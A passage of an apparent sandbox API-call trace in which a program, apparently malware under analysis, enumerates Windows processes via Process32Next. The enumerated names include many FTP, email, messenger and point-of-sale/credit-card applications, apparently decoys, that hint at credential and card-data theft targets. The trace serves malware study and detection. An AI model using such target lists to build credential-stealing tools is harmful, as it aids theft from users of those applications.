th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0199.078] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.081] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0199.083] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0199.085] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0199.087] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.090] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.125] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0199.128] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.133] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.136] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.138] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.140] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.142] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.143] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.145] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0199.147] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0199.148] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.150] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0199.153] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.155] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0199.158] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0199.160] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0199.200] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0199.202] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0199.204] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0199.206] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.208] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0199.209] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0199.210] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0199.212] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.214] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0199.215] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0199.218] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0199.219] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0199.221] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0199.222] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0199.224] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0199.225] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0199.227] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0199.229] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0199.231] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0199.232] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0199.234] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0199.298] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0199.300] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0199.303] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0199.305] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0199.307] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0199.310] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0199.312] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0199.314] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0199.316] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0199.321] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0199.324] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0199.327] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0199.329] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0199.332] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0199.376] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0199.384] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0199.387] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0199.389] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0199.392] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0199.394] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0199.396] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0199.399] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0199.403] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0199.407] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0199.410] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0199.413] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0199.417] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0199.428] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0199.431] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0199.434] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0199.437] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0199.440] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0199.443] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0199.447] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0199.450] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0199.453] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0199.457] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0199.460] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0199.468] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0199.471] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0199.474] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 